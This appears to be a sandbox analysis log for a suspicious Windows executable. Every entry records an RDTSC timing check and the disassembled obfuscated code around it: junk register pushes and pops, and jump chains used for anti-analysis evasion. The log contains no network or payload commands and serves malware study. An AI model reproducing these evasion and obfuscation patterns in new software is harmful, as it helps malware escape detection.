              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F6BA12 second address: F6BA18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108DC37 second address: 108DC43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F646CD14776h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108F593 second address: 108F5AC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F646C53F7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F646C53F7ACh 0x00000010 jnl 00007F646C53F7A6h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108F5AC second address: 108F5FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646CD14784h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jns 00007F646CD1477Ch 0x00000014 jmp 00007F646CD14783h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F646CD1477Ah 0x00000020 jmp 00007F646CD1477Ah 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108F5FE second address: 108F608 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F646C53F7A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1092315 second address: 109231A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 109231A second address: 10923AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F646C53F7B0h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F646C53F7A8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 push 00000004h 0x0000002a push 00000000h 0x0000002c push esi 0x0000002d call 00007F646C53F7A8h 0x00000032 pop esi 0x00000033 mov dword ptr [esp+04h], esi 0x00000037 add dword ptr [esp+04h], 0000001Ch 0x0000003f inc esi 0x00000040 push esi 0x00000041 ret 0x00000042 pop esi 0x00000043 ret 0x00000044 mov edx, 164B19C8h 0x00000049 call 00007F646C53F7B9h 0x0000004e push ecx 0x0000004f or dword ptr [ebp+12475CEEh], edx 0x00000055 pop edx 0x00000056 pop edx 0x00000057 call 00007F646C53F7A9h 0x0000005c je 00007F646C53F7B4h 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 10923AF second address: 10923B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 10923B5 second address: 10923E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F646C53F7B9h 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jng 00007F646C53F7B0h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 10923E2 second address: 10923F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 10926D8 second address: 10926F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F646C53F7ABh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70659 second address: 4F7066B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov esi, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c movsx edx, cx 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F7066B second address: 4F706AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 jmp 00007F646C53F7B8h 0x0000000d xchg eax, ecx 0x0000000e pushad 0x0000000f mov cx, E43Dh 0x00000013 mov esi, 2FDA8739h 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F646C53F7B2h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F706AC second address: 4F706B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F706B2 second address: 4F706B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F706B6 second address: 4F706BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F706BA second address: 4F7070C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 jmp 00007F646C53F7B9h 0x0000000e xchg eax, esi 0x0000000f jmp 00007F646C53F7AEh 0x00000014 push eax 0x00000015 jmp 00007F646C53F7ABh 0x0000001a xchg eax, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F646C53F7B0h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F7070C second address: 4F70710 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70710 second address: 4F70716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70716 second address: 4F70731 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD1477Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70731 second address: 4F70735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70735 second address: 4F7073B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F7073B second address: 4F7076A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov di, cx 0x0000000e movzx ecx, di 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F646C53F7ABh 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F7076A second address: 4F70770 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70770 second address: 4F70774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70774 second address: 4F707C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD1477Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d mov di, si 0x00000010 pushfd 0x00000011 jmp 00007F646CD14780h 0x00000016 and si, 7F88h 0x0000001b jmp 00007F646CD1477Bh 0x00000020 popfd 0x00000021 popad 0x00000022 push dword ptr [ebp+08h] 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F646CD14785h 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F707C7 second address: 4F707D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F646C53F7ACh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F707D7 second address: 4F707DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F7084D second address: 4F70854 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70854 second address: 4F70876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F646CD14787h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70876 second address: 4F60008 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, bh 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b pushad 0x0000000c mov cx, E899h 0x00000010 mov bl, cl 0x00000012 popad 0x00000013 leave 0x00000014 jmp 00007F646C53F7B1h 0x00000019 retn 0004h 0x0000001c nop 0x0000001d cmp eax, 00000000h 0x00000020 setne al 0x00000023 jmp 00007F646C53F7A2h 0x00000025 xor ebx, ebx 0x00000027 test al, 01h 0x00000029 jne 00007F646C53F7A7h 0x0000002b sub esp, 04h 0x0000002e mov dword ptr [esp], 0000000Dh 0x00000035 call 00007F64706BCD9Bh 0x0000003a mov edi, edi 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F60008 second address: 4F6000E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F6000E second address: 4F600BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 mov dx, ax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e call 00007F646C53F7B6h 0x00000013 mov ah, F3h 0x00000015 pop edi 0x00000016 mov ebx, ecx 0x00000018 popad 0x00000019 push eax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F646C53F7AFh 0x00000021 jmp 00007F646C53F7B3h 0x00000026 popfd 0x00000027 call 00007F646C53F7B8h 0x0000002c mov cx, 4901h 0x00000030 pop esi 0x00000031 popad 0x00000032 xchg eax, ebp 0x00000033 pushad 0x00000034 push ebx 0x00000035 pushfd 0x00000036 jmp 00007F646C53F7B6h 0x0000003b and al, 00000048h 0x0000003e jmp 00007F646C53F7ABh 0x00000043 popfd 0x00000044 pop esi 0x00000045 mov si, di 0x00000048 popad 0x00000049 mov ebp, esp 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F646C53F7AEh 0x00000052 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F600BC second address: 4F600C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F600C1 second address: 4F600F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F646C53F7B7h 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d sub esp, 2Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F646C53F7B2h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F600F7 second address: 4F600FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F600FD second address: 4F6012E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d mov eax, 102B0503h 0x00000012 mov ch, EEh 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F646C53F7B1h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F6012E second address: 4F60187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F646CD1477Ah 0x00000009 add ah, FFFFFFF8h 0x0000000c jmp 00007F646CD1477Bh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, ebx 0x00000016 jmp 00007F646CD14786h 0x0000001b xchg eax, edi 0x0000001c pushad 0x0000001d mov bx, si 0x00000020 mov esi, 70F379E9h 0x00000025 popad 0x00000026 push eax 0x00000027 jmp 00007F646CD1477Fh 0x0000002c xchg eax, edi 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F60187 second address: 4F6018B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F6018B second address: 4F6018F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F6018F second address: 4F60195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F601C1 second address: 4F6020F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD14789h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b jmp 00007F646CD14787h 0x00000010 sub edi, edi 0x00000012 jmp 00007F646CD1477Fh 0x00000017 inc ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F6020F second address: 4F60215 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F60215 second address: 4F6021B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F6021B second address: 4F6021F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F6021F second address: 4F60254 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD14784h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test al, al 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F646CD14787h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F60254 second address: 4F602A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F646C53F9A0h 0x0000000f pushad 0x00000010 call 00007F646C53F7ACh 0x00000015 movzx esi, di 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007F646C53F7AAh 0x00000021 xor cx, B358h 0x00000026 jmp 00007F646C53F7ABh 0x0000002b popfd 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F602A6 second address: 4F602B8 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 lea ecx, dword ptr [ebp-14h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov bx, ax 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F602B8 second address: 4F602BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F602BE second address: 4F602C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F602C2 second address: 4F602C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F60426 second address: 4F6042C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F6042C second address: 4F60430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F60430 second address: 4F60434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F60544 second address: 4F6054A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F605AC second address: 4F605B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F605B2 second address: 4F50EE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F64DC9CD832h 0x00000011 xor eax, eax 0x00000013 jmp 00007F646C518EDAh 0x00000018 pop esi 0x00000019 pop edi 0x0000001a pop ebx 0x0000001b leave 0x0000001c retn 0004h 0x0000001f nop 0x00000020 xor ebx, ebx 0x00000022 cmp eax, 00000000h 0x00000025 je 00007F646C53F903h 0x0000002b call 00007F64706ADA87h 0x00000030 mov edi, edi 0x00000032 jmp 00007F646C53F7B7h 0x00000037 xchg eax, ebp 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007F646C53F7B4h 0x0000003f jmp 00007F646C53F7B5h 0x00000044 popfd 0x00000045 pushad 0x00000046 mov esi, 29EBB34Dh 0x0000004b push esi 0x0000004c pop edi 0x0000004d popad 0x0000004e popad 0x0000004f push eax 0x00000050 jmp 00007F646C53F7AFh 0x00000055 xchg eax, ebp 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 call 00007F646C53F7ABh 0x0000005e pop eax 0x0000005f jmp 00007F646C53F7B9h 0x00000064 popad 0x00000065 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F50EE4 second address: 4F50EEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F50EEA second address: 4F50EEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F50EEE second address: 4F50F0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F646CD14782h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F50F0C second address: 4F50F12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F50F12 second address: 4F50F16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F50FB0 second address: 4F50FC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F646C53F7ACh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F60ADA second address: 4F60B1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 237F73E6h 0x00000008 jmp 00007F646CD14787h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 cmp dword ptr [7544459Ch], 05h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F646CD14785h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F60B1A second address: 4F60B65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F64DC9BD676h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F646C53F7ACh 0x00000016 sbb esi, 64A87D18h 0x0000001c jmp 00007F646C53F7ABh 0x00000021 popfd 0x00000022 mov eax, 471C8CCFh 0x00000027 popad 0x00000028 pop ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c movsx edx, cx 0x0000002f mov ebx, esi 0x00000031 popad 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F60BC1 second address: 4F60C52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F646CD14781h 0x00000009 sbb ax, BC26h 0x0000000e jmp 00007F646CD14781h 0x00000013 popfd 0x00000014 mov ecx, 44B9B157h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 pushad 0x00000021 mov si, di 0x00000024 pushfd 0x00000025 jmp 00007F646CD1477Fh 0x0000002a or ah, 0000005Eh 0x0000002d jmp 00007F646CD14789h 0x00000032 popfd 0x00000033 popad 0x00000034 mov eax, dword ptr [eax] 0x00000036 jmp 00007F646CD14781h 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 jmp 00007F646CD1477Ah 0x00000047 pushad 0x00000048 popad 0x00000049 popad 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F60CB5 second address: 4F60CBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F60CBB second address: 4F60CF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD14784h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b pushad 0x0000000c jmp 00007F646CD1477Eh 0x00000011 mov ax, B7A1h 0x00000015 popad 0x00000016 je 00007F64DD188412h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 mov di, E7AAh 0x00000025 popad 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F60CF9 second address: 4F60CFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F60CFF second address: 4F60D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F708A8 second address: 4F70960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebp 0x00000006 jmp 00007F646C53F7ACh 0x0000000b push eax 0x0000000c jmp 00007F646C53F7ABh 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 mov edx, esi 0x00000015 pushfd 0x00000016 jmp 00007F646C53F7B0h 0x0000001b sbb ecx, 015134E8h 0x00000021 jmp 00007F646C53F7ABh 0x00000026 popfd 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F646C53F7B4h 0x00000031 and ch, 00000048h 0x00000034 jmp 00007F646C53F7ABh 0x00000039 popfd 0x0000003a pushad 0x0000003b jmp 00007F646C53F7B6h 0x00000040 pushad 0x00000041 popad 0x00000042 popad 0x00000043 popad 0x00000044 xchg eax, esi 0x00000045 jmp 00007F646C53F7AEh 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e mov cl, 4Bh 0x00000050 call 00007F646C53F7B9h 0x00000055 pop ecx 0x00000056 popad 0x00000057 rdtsc
